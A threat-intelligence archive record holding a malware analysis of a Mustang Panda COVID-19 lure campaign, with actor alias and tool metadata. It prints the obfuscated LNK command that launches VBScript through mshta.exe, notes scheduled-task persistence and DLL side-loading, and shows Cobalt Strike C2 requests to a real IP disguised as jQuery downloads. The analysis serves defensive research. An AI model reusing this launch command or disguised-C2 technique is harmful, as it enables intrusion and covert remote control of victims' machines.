{
	"id": "ba4f3c0a-d150-4e4a-8087-a176f8fc2792",
	"created_at": "2026-04-06T00:14:52.428673Z",
	"updated_at": "2026-04-10T13:11:46.283486Z",
	"deleted_at": null,
	"sha1_hash": "2b606304def5433d1e843fec05d79602d80c9ac1",
	"title": "Mustang Panda joins the COVID-19 bandwagon",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 826759,
	"plain_text": "Mustang Panda joins the COVID-19 bandwagon\r\nPublished: 2020-03-22 · Archived: 2026-04-05 16:20:10 UTC\r\nIn a time where Corona is all over the news, cyber criminals are also taking advantage of this situation. Weeks ago\r\nI stumbled on a twitter post regarding the MustangPanda APT group and decided to take a look at it.\r\nTwitter status that started this blog post\r\nSummary\r\nThe attack consists of multiple stages and it all starts with a LNK File which contains embedded HTML Code\r\nwith a script tag carrying VBScript code.\r\nThe LNK file runs a command that executes the embedded code via mshta.exe. Afterwards a decoy document and\r\ndropper are placed and executed on the system.\r\nThe Dropper drops 3 other files into the Public Music folder and persists tencentsoso.exe via the task scheduler.\r\nThose files are all loaded into memory in order to execute code which contacts the C2 server to download the final\r\nstage which is believed to be a Cobalt Strike Payload.\r\nStage 1 – LNK Dropper\r\nhttps://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/\r\nPage 1 of 7\n\nBy looking at the properties of the LNK file we can find a malicious command entered into the target property:\r\n# raw\r\n%comspec% /c f%windir:~-3,1%%PUBLIC:~-9,1% %x in (%temp%=%cd%) do f%windir:~-3,1%%PUBLIC:~-9,1% /f \"delims==\" %i\r\n# beautified and pseudo code like\r\ncmd.exe /c for %x in (%temp%=%cd%)\r\ndo for /f \"delims==\" %i in ('dir %x\\02-21-1.lnk /s /b')\r\ndo start mshta.exe \"%i\"\r\nTo simplify this, the command searches for the 02-21-1.lnk and executes it via mshta.exe. Mshta.exe[1] is an\r\nexecutable on Windows that can be used to run HTML Applications. In this case it is used to run malicious\r\nVBScript code which is embedded in HTML Tags that can be found in the LNK file.\r\nhttps://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/\r\nPage 2 of 7\n\nGraphic explaining the lnk stage\r\nThe VBScript code opens a decoy document containing Chinese text, drops a PE executable and runs it. Here is\r\nthe text translated into English:\r\nTaiwanese deputy leader Chen Jianren recently wrote on Facebook that the characteristic of community transmissio\r\nTaiwan's \"Foreign Ministry\" demanded that the United States correct it. Many netizens ridiculed that the authori\r\nStage 2 – PE DROPPER\r\nThe dropped file is a PE executable that serves as another dropper which contains a resource named “HELP”.\r\nhttps://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/\r\nPage 3 of 7\n\nPicture of Resource Hacker showing the resource\r\nWhen executed, 3 files from the “HELP” resource are dropped into C:\\Users\\Public\\Music and schtasks.exe is run\r\nin order to achieve persistence on the system.\r\nDisassembly snippet of execution of schtasks.exe to persist one of the dropped files\r\ntencentsoso.exe is actually a real file from Tencent and at least part of the software Tencent SideBar. The DLL File\r\nhere however is custom made and used to load the nsa binary file. I believe that the attackers are trying to trick\r\nvictims here into believing that this is legit software.\r\nStage 3 – Final PE File\r\nOnce tencentsoso.exe is executed, it dynamically loads the SideBar.DLL. The DLL then reads the nsa file and\r\ndecrypts it with a simple XORing, allocates memory via VirtualAlloc with executable rights and writes the\r\ndecrypted nsa content into executable memory. Afterwards it jumps to this executable content.\r\nhttps://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/\r\nPage 4 of 7\n\nDecrypting nsa and dynamically jump to decrypted part\r\nThe sample uses a Cobalt Strike feature known as malleable c2 and contacts its C2 server 123.51.185.75 to\r\ndownload the next payload.\r\nGET /jquery-3.3.1.slim.min.js HTTP/1.1\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nHost: code.jquery.com\r\nReferer: http://code.jquery.com/\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko)\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nLooking at the response in Wireshark, it becomes clear that the attackers hide the payload in the JQuery code. It\r\nreads the content of the file into a buffer, decrypts the code area and jumps to the offset 0x1008 to start the next\r\nstage.\r\nhttps://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/\r\nPage 5 of 7\n\nHTTP Response from C2 Server\r\nStart of decrypted payload in JQuery response\r\nFrom here on the sample keeps sending HTTP requests to the C2 Server and waits for commands:\r\nhttps://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/\r\nPage 6 of 7\n\nGET /jquery-3.3.1.min.js HTTP/1.1\r\nHost: code.jquery.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nReferer: http://code.jquery.com/\r\nAccept-Encoding: gzip, deflate\r\nCookie: __cfduid=Z_FZubVJKboirizDP2zDYMDszubh4QhllqA5XPSeH2a5qAF0fLAjetJ4gIh5Gsr8WBWkWvD7w0y2zviHFqOhQHKgib9HdE0\r\nUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko)\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nHTTP/1.1 200 OK\r\nDate: Sun, 22 Mar 2020 08:24:59 GMT\r\nServer: NetDNA-cache/2.2\r\nContent-Length: 5543\r\nKeep-Alive: timeout=10, max=100\r\nConnection: keep-alive\r\nContent-Type: application/javascript; charset=utf-8\r\nCache-Control: max-age=0, no-cache\r\nPragma: no-cache\r\nThis final stage is believed to be Cobalt Strike. Any.Run Sandbox also detects it[2].\r\nBy looking at the traffic and doing some research, I found multiple posts that explain the way Cobalt Strike hides\r\npayloads in HTTP responses, the most interesting one being this one[3].\r\nIcon used were made by Pixel perfect from www.flaticon.com\r\nSource: https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/\r\nhttps://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://malwareandstuff.com/mustang-panda-joins-the-covid19-bandwagon/"
	],
	"report_names": [
		"mustang-panda-joins-the-covid19-bandwagon"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-10T02:00:03.645565Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta ",
				"HoneyMyte ",
				"Mustang Panda ",
				"Red Delta ",
				"Red Lich ",
				"Stately Taurus ",
				"TA416 ",
				"Temp.Hex ",
				"Twill Typhoon "
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-10T02:00:05.310361Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434492,
	"ts_updated_at": 1775826706,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2b606304def5433d1e843fec05d79602d80c9ac1.pdf",
		"text": "https://archive.orkl.eu/2b606304def5433d1e843fec05d79602d80c9ac1.txt",
		"img": "https://archive.orkl.eu/2b606304def5433d1e843fec05d79602d80c9ac1.jpg"
	}
}